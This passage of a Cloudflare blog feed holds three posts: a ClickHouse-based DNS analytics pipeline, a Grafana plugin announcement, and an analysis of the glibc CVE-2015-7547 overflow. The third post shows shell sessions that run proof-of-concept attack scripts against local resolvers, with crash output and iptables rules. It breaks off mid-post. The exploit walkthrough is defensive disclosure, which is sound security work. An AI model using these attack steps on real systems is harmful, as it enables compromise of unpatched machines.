            <content:encoded><![CDATA[ <p>On Friday, we <a href="/dns-analytics/">announced DNS analytics</a> for all Cloudflare customers. Because of our scale –– by the time you’ve finished reading this, Cloudflare DNS will have handled millions of DNS queries –– we had to be creative in our implementation. In this post, we’ll describe the systems that make up DNS Analytics which help us comb through trillions of these logs each month.</p>
    <div>
      <h3>How logs come in from the edge</h3>
      <a href="#how-logs-come-in-from-the-edge">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/43iWrS8JtJwUtuUMJoO4Bx/27e5021c786337d38293d03f8260a104/Screen-Shot-2017-05-10-at-2.35.39-PM.png" />
            
            </figure><p>Cloudflare already has a <a href="/scaling-out-postgresql-for-cloudflare-analytics-using-citusdb">data pipeline for HTTP logs</a>. We wanted to utilize what we could of that system for the new DNS analytics. Every time one of our edge services gets an HTTP request, it generates a structured log message in the <a href="https://capnproto.org">Cap’n Proto</a> format and sends it to a local multiplexer service. Given the volume of the data, we chose not to record the full DNS message payload, only telemetry data we are interested in such as response code, size, or query name, which has allowed us to keep only ~150 bytes on average per message. It is then fused with processing metadata such as timing information and exceptions triggered during query processing. The benefit of fusing data and metadata at the edge is that we can spread the computational cost across our thousands of edge servers, and log only what we absolutely need.</p><p>The multiplexer service (known as “log forwarder”) is running on each edge node, assembling log messages from multiple services and transporting them to our warehouse for processing over a TLS secured channel. A counterpart service running in the warehouse receives and demultiplexes the logs into several Apache Kafka clusters. Over the years, Apache Kafka has proven to be an invaluable service for buffering between producers and downstream consumers, preventing data loss when consumers fail over or require maintenance. Since version 0.10, Kafka allows <a href="https://issues.apache.org/jira/browse/KAFKA-1215">rack-aware allocation of replicas</a>, which improves resilience against rack or site failure, giving us fault tolerant storage of unprocessed messages.</p>
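The ~150 bytes per message figure matters at this scale. A back-of-the-envelope estimate (assuming the headline rate of 1M queries per second were sustained, which real traffic of course isn’t exactly):

```python
QPS = 1_000_000               # headline DNS query rate
BYTES_PER_MSG = 150           # average structured log size after trimming the payload

bandwidth_mb_per_s = QPS * BYTES_PER_MSG / 1e6    # ~150 MB/s into the pipeline
messages_per_month = QPS * 60 * 60 * 24 * 30      # ~2.6 trillion, matching the
                                                  # "trillions of logs" figure
```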
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/39oKpjRECU2vqTqBI6FM4h/cbe9e83d633142933d6d2291a28acc57/data-pipeline-lg.png" />
            
            </figure><p>Having a queue with structured logs has allowed us to investigate issues retrospectively without requiring access to production nodes, but it has proven to be quite laborious at times. In the early days of the project we would skim the queue to find offsets for the rough timespan we needed, and then extract the data into HDFS in <a href="https://parquet.apache.org">Parquet</a> format for offline analysis.</p>
    <div>
      <h3>About aggregations</h3>
      <a href="#about-aggregations">
        
      </a>
    </div>
    <p>The HTTP analytics service was built around stream processors generating aggregations, so we planned to leverage Apache Spark to stream the logs to HDFS automatically. As Parquet doesn’t natively support indexes or arranging the data in a way that avoids full table scans, it’s impractical for on-line analysis or serving reports over an API. There are extensions like <a href="https://github.com/lightcopy/parquet-index">parquet-index</a> that create indexes over the data, but not on-the-fly. Given this, the initial plan was to only show aggregated reports to customers, and keep the raw data for internal troubleshooting.</p><p>The problem with aggregated summaries is that they only work on columns with low cardinality (the number of unique values). With aggregation, each column in a given time frame explodes into as many rows as there are unique entries, so it’s viable to aggregate on something like response code, which only has 12 possible values, but not on a query name, for example. <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">Domain names</a> are subject to popularity, so if, for example, a popular domain name gets asked 1,000 times a minute, one could expect a 1,000x row reduction from per-minute aggregation; in practice, it is not so.</p><p>Due to how DNS caching works, resolvers will answer identical queries from cache without going to the authoritative server for the duration of the TTL. The TTL tends to be longer than a minute. So, while authoritative servers see the same request many times, our data is skewed towards non-cacheable queries such as typos or random prefix subdomain attacks. In practice, we see anywhere between a 0x and 60x row reduction when aggregating by query name, so storing aggregations in multiple resolutions almost negates the row reduction. Aggregations are also computed for multiple resolution and key combinations, so aggregating on a high-cardinality column can even produce more rows than the original data.</p>
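<p>A small, self-contained Python simulation makes the cardinality argument concrete (the traffic mix is invented for illustration): grouping by a low-cardinality key collapses thousands of rows into a handful of groups, while a random-prefix tail keeps almost every query name unique.</p>

```python
import random
from collections import Counter

random.seed(7)

# One simulated minute of resolver-visible traffic: one popular cacheable
# name plus a long tail of random-prefix junk, mimicking the skew described
# above. Each row is (query_name, response_code).
popular = [("example.com", 0)] * 1000
junk = [(f"{random.randrange(10**9)}.example.com", 3) for _ in range(1000)]
queries = popular + junk

def row_reduction(rows, key):
    """How many input rows collapse into one aggregated row, on average."""
    groups = Counter(key(r) for r in rows)
    return len(rows) / len(groups)

# Low-cardinality key (response code): 2,000 rows shrink to 2 groups.
print(row_reduction(queries, key=lambda r: r[1]))
# High-cardinality key (query name): the random tail defeats aggregation.
print(row_reduction(queries, key=lambda r: r[0]))
```

<p>Storing the same aggregation at several time resolutions multiplies those per-key rows again, which is why aggregating on query names bought so little in practice.</p>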
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2jfGlvqdn84rSStt6KYsPO/eb0b6c634a9cf130335ff77443b474b8/data-agg-lg-1.png" />
            
            </figure><p>For these reasons we started by only aggregating logs at the zone level, which was useful enough for trends, but too coarse for root cause analysis. For example, in one case we were investigating short bursts of unavailability in one of our data centers. Having unaggregated data allowed us to narrow the issue down to the specific DNS queries experiencing latency spikes, and then correlate the queries with a misconfigured firewall rule. Cases like these would be much harder to investigate with only aggregated data, as the issue affected only a tiny percentage of requests that would be lost in the aggregations.</p><p>So we started looking into several OLAP (Online Analytical Processing) systems. The first system we looked into was <a href="http://druid.io">Druid</a>. We were really impressed with the capabilities and how the front-end (Pivot and formerly Caravel) is able to slice and dice the data, allowing us to generate reports with arbitrary dimensions. Druid has already been deployed in similar environments with over 100B events/day, so we were confident it could work, but after testing on sampled data we couldn’t justify the hardware costs of hundreds of nodes. Around the same time Yandex open-sourced their OLAP system, <a href="https://clickhouse.yandex/">ClickHouse</a>.</p>
    <div>
      <h3>And then it Clicked</h3>
      <a href="#and-then-it-clicked">
        
      </a>
    </div>
    <p>ClickHouse has a much simpler system design - all the nodes in a cluster have equal functionality and use only <a href="https://zookeeper.apache.org/">ZooKeeper</a> for coordination. We built a small cluster of several nodes to start kicking the tires, and found the performance to be quite impressive and true to the results advertised in the <a href="https://clickhouse.yandex/benchmark.html">performance comparisons of analytical DBMS</a>, so we proceeded with building a proof of concept. The first obstacle was a lack of tooling and the small size of the community, so we delved into the ClickHouse design to understand how it works.</p><p>ClickHouse doesn’t support ingestion from Kafka directly, as it’s only a database, so we wrote an adapter service in Go. It read Cap’n Proto encoded messages from Kafka, converted them into TSV, and inserted them into ClickHouse over the HTTP interface in batches. Later, we rewrote the service to use a <a href="https://github.com/kshvakov/clickhouse">Go library</a> using the native ClickHouse interface to boost performance. Since then, we’ve contributed some performance improvements back to the project. One thing we learned during the ingestion performance evaluation is that ClickHouse ingestion performance depends heavily on batch size - the number of rows you insert at once. To understand why, we looked further into how ClickHouse stores data.</p><p>The most common table engine ClickHouse uses for storage is the MergeTree family. It is conceptually similar to the <a href="https://en.wikipedia.org/wiki/Log-structured_merge-tree">LSM algorithm</a> used in <a href="https://www.igvita.com/2012/02/06/sstable-and-log-structured-storage-leveldb">Google’s BigTable</a> or Apache Cassandra; however, it avoids an intermediate memory table and writes directly to disk. This gives it excellent write throughput, as each inserted batch is only sorted by “primary key”, compressed, and written to disk to form a segment.
The absence of a memory table or any notion of “freshness” of the data also means that it is append-only and data modification or deletion isn’t supported. The only way to delete data currently is to drop whole calendar months, as segments never overlap a month boundary. The ClickHouse team is actively working on making this configurable. On the other hand, this makes writing and segment merging conflict-free, so the ingestion throughput scales linearly with the number of parallel inserts until the I/O or cores are saturated. This, however, also means it is not fit for tiny batches, which is why we rely on Kafka and inserter services for buffering. ClickHouse then keeps constantly merging segments in the background, so many small parts will be merged and written more times (thus increasing write amplification), and too many unmerged parts will trigger aggressive throttling of insertions until the merging progresses. We have found that several insertions per table per second work best as a tradeoff between real-time ingestion and ingestion performance.</p><p>The key to table read performance is indexing and the arrangement of the data on disk. No matter how fast processing is, when the engine needs to scan terabytes of data from disk and use only a fraction of it, it’s going to take time. ClickHouse is a columnar store, so each segment contains a file for each column, with sorted values for each row. This way, whole columns not present in the query can be skipped, and then multiple cells can be processed in parallel with vectorized execution. In order to avoid full scans, each segment also has a sparse index file. Given that all columns are sorted by the “primary key”, the index file contains only marks (sampled rows) for every Nth row, so that it can be kept in memory even for very large tables. For example, the default setting is to make a mark of every 8,192nd row.
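<p>The buffering that the inserter services perform can be sketched in a few lines. This is a toy Python stand-in, not the Go adapter described above; the table name and the <code>send</code> callback are hypothetical, and a real deployment would POST each batch to ClickHouse’s HTTP interface.</p>

```python
from typing import Callable, List, Tuple

class BatchingInserter:
    """Buffer rows and flush them to ClickHouse as one large TSV INSERT.

    Each insert creates a new sorted on-disk part that background merges
    must later fold in, so a few large batches per second per table beat
    thousands of tiny inserts.
    """

    def __init__(self, table: str, send: Callable[[str, bytes], None],
                 batch_size: int = 100_000):
        self.table = table
        self.send = send          # e.g. an HTTP POST to the ClickHouse port
        self.batch_size = batch_size
        self.rows: List[Tuple] = []

    def insert(self, row: Tuple) -> None:
        self.rows.append(row)
        if len(self.rows) >= self.batch_size:
            self.flush()

    def flush(self) -> None:
        if not self.rows:
            return
        # One TSV body per batch: rows joined by newlines, fields by tabs.
        body = "\n".join("\t".join(map(str, r)) for r in self.rows).encode()
        self.send(f"INSERT INTO {self.table} FORMAT TabSeparated", body)
        self.rows.clear()
```

<p>Sizing <code>batch_size</code> trades ingestion latency against the write amplification and merge throttling described above.</p>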
This way only 122,070 marks are required to sparsely index a table with 1 billion rows, which easily fits in memory. See <a href="https://medium.com/@f1yegor/clickhouse-primary-keys-2cf2a45d7324">primary keys in ClickHouse</a> for a deeper dive into how it works.</p><p>When querying the table using primary key columns, the index returns approximate ranges of rows considered. Ideally, the ranges should be wide and contiguous. For example, when the typical usage is to generate reports for individual zones, placing the zone on the first position of the primary key will result in rows sorted by zone in each column, making the disk reads for individual zones contiguous, whereas sorting primarily by timestamp would not. The rows can be sorted in only one way, so the primary key must be chosen carefully with the typical query load in mind. In our case, we optimized read queries for individual zones and have a separate table with sampled data for exploratory queries. The lesson learned: instead of trying to optimize one index for all purposes and splitting the difference, we made several specialized tables.</p><p>One such specialisation is tables with aggregations over zones. Queries across all rows are significantly more expensive, as there is no opportunity to exclude data from scanning. This makes it less practical for analysts to compute basic aggregations over long periods of time, so we decided to use <a href="https://clickhouse.yandex/reference_en.html#CREATE%20VIEW">materialized views</a> to incrementally compute predefined aggregations, such as counters, uniques, and quantiles. The materialized views leverage the sort phase on batch insertion to do productive work - computing aggregations.
So after the newly inserted segment is sorted, it also produces a table with rows representing dimensions, and columns representing <a href="https://github.com/yandex/ClickHouse/blob/master/doc/developers/architecture.md#aggregate-functions">aggregation function state</a>. The difference between aggregation state and final result is that we can generate reports using an arbitrary time resolution without actually storing the precomputed data in multiple resolutions. In some cases the state and result can be the same - for example basic counters, where hourly counts can be produced by summing per-minute counts; however, it doesn’t make sense to sum unique visitors or latency quantiles. This is when aggregation state is much more useful, as it allows meaningful merging of more complicated states, such as a <a href="https://en.wikipedia.org/wiki/HyperLogLog">HyperLogLog (HLL)</a> bitmap, to produce an hourly unique visitor estimate from per-minute aggregations. The downside is that storing state can be much more expensive than final values - the aforementioned HLL state tends to be 20-100 bytes per row when compressed, while a counter is only 8 bytes (1 byte compressed on average). These tables are then used to quickly visualise general trends across zones or sites, and also by our API service that uses them opportunistically for simple queries. Having both incrementally aggregated and unaggregated data in the same place allowed us to simplify the architecture by deprecating stream processing altogether.</p>
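<p>Why merge states instead of summing finalized results? A toy Python illustration, with plain sets standing in for HLL sketches (ClickHouse itself stores the opaque state produced by aggregate functions such as <code>uniqState</code> and combines it with the corresponding merge function):</p>

```python
# Per-minute "aggregation states" for two minutes of traffic.
minute1 = {"count": 3, "uniques_state": {"1.2.3.4", "5.6.7.8"}}
minute2 = {"count": 2, "uniques_state": {"5.6.7.8", "9.9.9.9"}}

# Counters: state and final result coincide, so coarser resolutions
# are plain sums of finer ones.
hourly_count = minute1["count"] + minute2["count"]  # 5

# Uniques: summing finalized per-minute results overcounts repeat visitors...
wrong = len(minute1["uniques_state"]) + len(minute2["uniques_state"])  # 4

# ...but merging the states first gives the true coarser-grained answer.
hourly_uniques = len(minute1["uniques_state"] | minute2["uniques_state"])  # 3
```

<p>An HLL sketch plays the role of the set here, answering the same question approximately in the 20-100 compressed bytes mentioned above rather than an unbounded set of addresses.</p>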
    <div>
      <h3>Infrastructure and data integrity</h3>
      <a href="#infrastructure-and-data-integrity">
        
      </a>
    </div>
    <p>We started with RAID-10 composed of 12 6TB spinning disks on each node, but reevaluated it after the first inevitable disk failures. In the second iteration we migrated to RAID-0, for two reasons. First, it wasn’t possible to hot-swap just the faulty disks, and second, the array rebuild took tens of hours, which degraded I/O performance. It was significantly faster to replace a faulty node and use internal replication to populate it with data over the network (2x10GbE), than to wait for an array to finish rebuilding. To compensate for the higher probability of node failure, we switched to 3-way replication and allocated replicas of each shard to different racks, and started planning for replication to a separate data warehouse.</p><p>Another disk failure <a href="https://github.com/yandex/ClickHouse/issues/520">highlighted a problem</a> with the filesystem we used. Initially we used XFS, but it started to lock up during replication from two peers at the same time, breaking segment replication before it completed. The issue manifested as a lot of I/O activity with little increase in disk usage, as broken parts were deleted, so we gradually migrated to ext4, which didn’t have the same issue.</p>
    <div>
      <h3>Visualizing Data</h3>
      <a href="#visualizing-data">
        
      </a>
    </div>
    <p>At the time we relied solely on <a href="http://pandas.pydata.org">Pandas</a> and <a href="https://clickhouse.yandex/reference_en.html#HTTP%20interface">ClickHouse’s HTTP interface</a> for ad-hoc analyses, but we wanted to make it more accessible for both analysis and monitoring. Since we knew Caravel - now renamed to <a href="https://github.com/airbnb/superset">Superset</a> - from the experiments with Druid, we started working on an integration with ClickHouse.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4flBsPFls2o0tCyU2N5MqV/3e92f7508c3a869c7ed13438607bc2de/superset-1.png" />
            
            </figure><p>Superset is a data visualisation platform designed to be intuitive, and allows analysts to interactively slice and dice the data without writing a single line of SQL. It was initially <a href="https://medium.com/airbnb-engineering/caravel-airbnb-s-data-exploration-platform-15a72aa610e5">built and open sourced by Airbnb</a> for Druid, but over time it has gained support for SQL-based backends using <a href="https://www.sqlalchemy.org">SQLAlchemy</a>, an abstraction and ORM for dozens of different database dialects. So we wrote and open-sourced a <a href="https://github.com/cloudflare/sqlalchemy-clickhouse">ClickHouse dialect</a> and finally a native <a href="https://github.com/airbnb/superset/pull/1844">Superset integration</a> that was merged a few days ago.</p><p>Superset has served us well for ad-hoc visualisations, but it is still not polished enough for our monitoring use case. At Cloudflare we’re heavy users of Grafana for visualisation of all our metrics, so we wrote and open-sourced a <a href="https://github.com/vavrusa/grafana-sqldb-datasource">Grafana integration</a> as well.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6HRlF5lQlrcikqgwFWM6cs/fdefd2e8f8d23a1fb371fbc9c72cb7a6/Screen-Shot-2017-05-08-at-12.39.47-1.png" />
            
            </figure><p>It has allowed us to seamlessly extend our existing monitoring dashboards with the new analytical data. We liked it so much that we wanted to give you, our users, the same ability to explore the analytics data. So we built a <a href="/grafana-plugin">Grafana app</a> to visualise data from Cloudflare DNS Analytics. Finally, we made it available in your <a href="/dns-analytics/">Cloudflare dashboard analytics</a>. Over time we’re going to add new data sources, dimensions, and other useful ways to visualise your data from Cloudflare. Let us know what you’d like to see next.</p><p>Does solving these kinds of technical and operational challenges excite you? Cloudflare is always hiring talented specialists and generalists within our <a href="https://www.cloudflare.com/careers/jobs/?department=Engineering">Engineering</a>, <a href="https://www.cloudflare.com/careers/jobs/">Technical Operations</a> and <a href="https://www.cloudflare.com/careers">other teams</a>.</p> ]]></content:encoded>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[Cap'n Proto]]></category>
            <category><![CDATA[Speed & Reliability]]></category>
            <guid isPermaLink="false">6vsdAcIrh7NQu1zjXcxRFT</guid>
            <dc:creator>Marek Vavruša</dc:creator>
        </item>
        <item>
            <title><![CDATA[Want to see your DNS analytics? We have a Grafana plugin for that]]></title>
            <link>https://blog.cloudflare.com/grafana-plugin/</link>
            <pubDate>Tue, 14 Feb 2017 18:04:08 GMT</pubDate>
            <description><![CDATA[ Curious where your DNS traffic is coming from, how much DNS traffic is on your domain, and what records people are querying for that don’t exist? We now have a Grafana plugin for you.

 ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Curious where your DNS traffic is coming from, how much DNS traffic is on your domain, and what records people are querying for that don’t exist? We now have a Grafana plugin for you.</p><p>Grafana is an open source data visualization tool that you can use to integrate data from many sources into one cohesive dashboard, and <a href="http://docs.grafana.org/alerting/rules/">even use it to set up alerts</a>. We’re big Grafana fans here - we use Grafana internally for our ops metrics dashboards.</p><p>In the Cloudflare Grafana plugin, you can see the response code breakdown of your DNS traffic. During a random prefix flood, a common type of DNS DDoS attack where an attacker queries random subdomains to bypass DNS caches and overwhelm the origin nameservers, you will see the number of NXDOMAIN responses increase dramatically. It is also common during normal traffic to have a small number of negative answers due to typos or clients searching for missing records.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2lx4BwSBiV5nQUNAbNolzl/4297d330f64822e001a478a9555d7f78/rcode.png" />
            
            </figure><p>You can also see the breakdown of queries by data center and by query type to understand where your traffic is coming from and what your domains are being queried for. This is very useful to identify localized issues, and to see how your traffic is spread globally.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5pOm5hXg0QRuSySo23lL3v/c917f8cd3db5f557eebfa75b3c4274c1/colo-qtype.png" />
            
            </figure><p>You can filter by specific data centers, record types, query types, response codes, and query name, so you can filter down to see analytics for just the MX records that are returning errors in one of the data centers, or understand whether the negative answers are generated because of a DNS attack, or misconfigured records.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3h1OmevfS9qBnIfHnTil6L/18f4fd1b286addec94829765eb60c9ab/Screen-Shot-2017-02-13-at-10.59.45-AM.png" />
            
            </figure><p>Once you have the Cloudflare Grafana Plugin installed, you can also make your own charts using the Cloudflare data set in Grafana, and integrate them into your existing dashboards.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/738PJEVjnkrzf5qnIUSL0S/7cca7ada36e01cb425efeb85a710e979/Screen-Shot-2017-02-13-at-11.08.11-AM.png" />
            
            </figure><p><a href="https://www.cloudflare.com/virtual-dns/">Virtual DNS customers</a> can also take advantage of the Grafana plugin. There is a custom Grafana dashboard that comes installed with the plugin to show traffic distribution and <a href="https://www.cloudflare.com/learning/cdn/glossary/round-trip-time-rtt/">RTT</a> from different Virtual DNS origins, as well as the top queries that are uncached or returning SERVFAIL.</p><p>The Grafana plugin takes just one step to install once you have Grafana up and running:</p>
            <pre><code>grafana-cli plugins install cloudflare-app</code></pre>
            <p>Once you sign in using your user email and API key, the plugin will automatically discover domains and Virtual DNS clusters you have access to.</p><p>The Grafana plugin is built on our new <a href="https://developers.cloudflare.com/api/#dns-analytics-properties">DNS analytics API</a>. If you want to explore your DNS traffic but Grafana isn’t your tool of choice, our DNS analytics API is very easy to get started with. Here’s a curl to get you started:</p>
            <pre><code>curl -s -H 'X-Auth-Key:####' -H 'X-Auth-Email:####' 'https://api.cloudflare.com/client/v4/zones/####/dns_analytics/report?metrics=queryCount’</code></pre>
            <p>To make all of this work, Cloudflare DNS is answering and logging millions of queries each second. Having high resolution data at this scale enables us to quickly pinpoint and resolve problems, and we’re excited to share this with you. More on this in a follow up deep dive blog post on improvements in our new data pipeline.</p><p>Instructions for how to get started with Grafana are <a href="https://support.cloudflare.com/hc/en-us/articles/115002722267">here</a> and DNS analytics API documentation is <a href="https://api.cloudflare.com/#dns-analytics-properties">here</a>. Enjoy!</p><p><i>This blog post was edited on 9/20/18 to update installation instructions.</i></p> ]]></content:encoded>
            <category><![CDATA[Analytics]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[Grafana]]></category>
            <category><![CDATA[DDoS]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">2mtV4vGRyX5uleTcj97Xrq</guid>
            <dc:creator>Marek Vavruša</dc:creator>
        </item>
        <item>
            <title><![CDATA[A tale of a DNS exploit: CVE-2015-7547]]></title>
            <link>https://blog.cloudflare.com/a-tale-of-a-dns-exploit-cve-2015-7547/</link>
            <pubDate>Mon, 29 Feb 2016 13:42:19 GMT</pubDate>
            <description><![CDATA[ A buffer overflow error in GNU libc DNS stub resolver code was announced last week as CVE-2015-7547. While it doesn't have any nickname yet (last year's Ghost was more catchy), it is potentially disastrous. ]]></description>
            <content:encoded><![CDATA[ <p><i>This post was written by Marek Vavruša and Jaime Cochran, who found out they were both independently working on the same glibc vulnerability attack vectors at 3am last Tuesday.</i></p><p>A buffer overflow error in GNU libc DNS stub resolver code was <a href="https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html">announced last week</a> as <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547">CVE-2015-7547</a>. While it doesn't have any nickname yet (last year's <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0235">Ghost</a> was more catchy), it is potentially disastrous as it affects any platform with recent GNU libc—CPEs, load balancers, servers and personal computers alike. The big question is: how exploitable is it in the real world?</p><p>It turns out that the only mitigation that works is patching. Please patch your systems <i>now</i>, then come back and read this blog post to understand why attempting to mitigate this attack by limiting DNS response sizes does not work.</p><p>But first, patch!</p>
    <div>
      <h3>On-Path Attacker</h3>
      <a href="#on-path-attacker">
        
      </a>
    </div>
    <p>Let's start with the <a href="https://github.com/fjserna/CVE-2015-7547">PoC from Google</a>; it uses the first attack vector described in the vulnerability announcement. First, a 2048-byte UDP response forces buffer allocation; then a failure response forces a retry; finally, the last two answers smash the stack.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo python poc.py &amp;
$ valgrind curl http://foo.bar.google.com
==17897== Invalid read of size 1
==17897==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==17897==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==17897==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==17897==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==17897==    by 0x4242424242424241: ???
==17897==  Address 0x4242424242424245 is not stack'd, malloc'd or (recently) free'd
Segmentation fault</code></pre>
            <p>This proof of concept requires the attacker to talk to the glibc stub resolver code either directly or through a simple forwarder. This situation happens when your DNS traffic is intercepted or when you’re using an untrusted network.</p><p>One of the suggested mitigations in the announcement was to limit the UDP response size to 2048 bytes, and to 1024 bytes in the case of TCP. Limiting UDP is, with all due respect, completely ineffective and only forces legitimate queries to retry over TCP. Limiting TCP answers is a plain protocol violation that cripples legitimate answers:</p>
            <pre><code>$ dig @b.gtld-servers.net +tcp +dnssec NS root-servers.net | grep "MSG SIZE"
;; MSG SIZE  rcvd: 1254</code></pre>
            <p>Regardless, let's see if response size clipping is effective at all. When calculating size limits, we have to account for the IPv4 header (20 octets) and the UDP header (8 octets), leading to a maximum allowed datagram size of 2076 octets. DNS/TCP may arrive fragmented—for the sake of argument, let's drop DNS/TCP altogether.</p>
            <pre><code>$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP
$ sudo iptables -I INPUT -p tcp --sport 53 -j DROP
$ valgrind curl http://foo.bar.google.com
curl: (6) Could not resolve host: foo.bar.google.com</code></pre>
            <p>Looks like we've mitigated the first attack method, albeit with collateral damage. But what about the UDP-only <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-udponly-py">proof of concept</a>?</p>
            <pre><code>$ echo "nameserver 127.0.0.10" | sudo tee /etc/resolv.conf
$ sudo python poc-udponly.py &amp;
$ valgrind curl http://foo.bar.google.com
==18293== Syscall param socketcall.recvfrom(buf) points to unaddressable byte(s)
==18293==    at 0x4F1E8C3: __recvfrom_nocancel (syscall-template.S:81)
==18293==    by 0x59FBFD0: send_dg (res_send.c:1259)
==18293==    by 0x59FBFD0: __libc_res_nsend (res_send.c:557)
==18293==    by 0x59F9C0B: __libc_res_nquery (res_query.c:227)
==18293==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18293==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18293==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18293==    by 0x4F08AA0: gaih_inet (getaddrinfo.c:862)
==18293==    by 0x4F0AC4C: getaddrinfo (getaddrinfo.c:2418)
==18293==  Address 0xfff001000 is not stack'd, malloc'd or (recently) free'd
*** Error in `curl': double free or corruption (out): 0x00007fe7331b2e00 ***
Aborted</code></pre>
            <p>While it's not possible to ship a whole attack payload within a 2048-byte UDP response, it still leads to memory corruption. When the announcement suggested blocking DNS UDP responses larger than 2048 bytes as a viable mitigation, it confused a <a href="https://blog.des.no/2016/02/freebsd-and-cve-2015-7547/">lot of people</a>, including other <a href="http://blog.powerdns.com/2016/02/17/powerdns-cve-2015-7547-possible-mitigation/">DNS vendors</a> and ourselves. This and the following proof of concept show that it's not only futile, but harmful in the long term if these rules are left enabled.</p><p>So far, the presented attacks required a MitM scenario, where the attacker talks to a glibc resolver directly. A "good enough" mitigation is to run a local caching resolver, to isolate glibc code from the attacker. In fact, doing so not only improves Internet performance with a local cache, but also prevents past and possibly future security vulnerabilities.</p>
    <div>
      <h4>Is a caching stub resolver really good enough?</h4>
      <a href="#is-a-caching-stub-resolver-really-good-enough">
        
      </a>
    </div>
    <p>Unfortunately, no. A local stub resolver such as <a href="http://www.thekelleys.org.uk/dnsmasq/doc.html">dnsmasq</a> alone is not sufficient to defuse this attack. Its cache is easy to traverse, as dnsmasq doesn't scrub upstream answers—let's see if the attack goes through with a <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-dnsmasq-py">modified proof of concept</a> that uses only well-formed answers and zero time-to-live (TTL) for cache traversal.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ sudo dnsmasq -d -a 127.0.0.1 -R -S 127.0.0.10 -z &amp;
$ sudo python poc-dnsmasq.py &amp;
$ valgrind curl http://foo.bar.google.com
==20866== Invalid read of size 1
==20866==    at 0x8617C55: __libc_res_nquery (res_query.c:264)
==20866==    by 0x861820F: __libc_res_nquerydomain (res_query.c:591)
==20866==    by 0x86187A8: __libc_res_nsearch (res_query.c:381)
==20866==    by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==20866==    by 0x1C000CC04D4D4D4C: ???
Killed</code></pre>
            <p>The big question is—now that we've seen that the mitigation strategies for MitM attacks are provably ineffective, can we exploit the flaw off-path through a caching DNS resolver?</p>
    <div>
      <h3>An off-path attack scenario</h3>
      <a href="#an-off-path-attack-scenario">
        
      </a>
    </div>
    <p>Let's start with the first phase of the attack—a compliant resolver is never going to give out a response larger than 512 bytes over UDP to a client that doesn't support EDNS0. Since the glibc resolver doesn't do that by default, we have to escalate to TCP and perform the whole attack there. Also, the client should have at least two nameservers configured; otherwise, a successful attack becomes more complicated.</p>
            <pre><code>$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
$ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf
$ sudo iptables -F INPUT
$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP</code></pre>
            <p>Let's try it with a <a href="https://gist.github.com/vavrusa/86efa3ac7ee89eab14c2#file-poc-tcponly-py">proof of concept</a> that merges both the DNS proxy and the attacker.</p><ol><li><p>The DNS proxy on localhost is going to ask the attacker both queries over UDP, and the attacker responds with a TC flag to force the client to retry over TCP.</p></li><li><p>The attacker responds once with a TCP response of 2049 bytes or longer, then forces the proxy to close the TCP connection to the glibc resolver. <i>This is a critical step, with no reliable way to achieve it.</i></p></li><li><p>The attacker sends back a full attack payload, which the proxy happily forwards to the glibc resolver client.</p></li></ol>
            <pre><code>$ sudo python poc-tcponly.py &amp;
$ valgrind curl http://foo.bar.google.com
==18497== Invalid read of size 1
==18497==    at 0x59F9C55: __libc_res_nquery (res_query.c:264)
==18497==    by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591)
==18497==    by 0x59FA7A8: __libc_res_nsearch (res_query.c:381)
==18497==    by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315)
==18497==    by 0x1C000CC04D4D4D4C: ???
==18497==  Address 0x1000000000000103 is not stack'd, malloc'd or (recently) free'd
Killed</code></pre>
            
    <div>
      <h3>Performing the attack over a real resolver</h3>
      <a href="#performing-the-attack-over-a-real-resolver">
        
      </a>
    </div>
